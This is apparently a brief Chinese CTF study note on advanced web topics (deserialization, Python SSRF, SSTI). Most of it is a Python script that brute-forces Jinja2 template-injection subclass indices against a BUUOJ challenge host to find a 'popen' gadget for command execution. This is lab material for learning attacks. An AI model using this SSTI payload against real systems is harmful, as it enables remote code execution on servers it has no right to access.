Web进阶2
反序列化漏洞
Python中的安全问题
Python里的SSRF
SSTI
import requests
for i in range(512):
password = f"%22%22.__class__.__bases__[0].__subclasses__()[{i}].__init__.__globals__"
url = f"http://1de70960-ff51-4887-b604-2f07b94f49bc.node3.buuoj.cn/?password=" + "{{" + password + "}}"
print(url)
payload = {}
files = []
headers = {}
response = requests.request("GET", url, headers=headers, data=payload, files=files)
if response.text.find('popen') != -1:
print(i)
exit(1)Last updated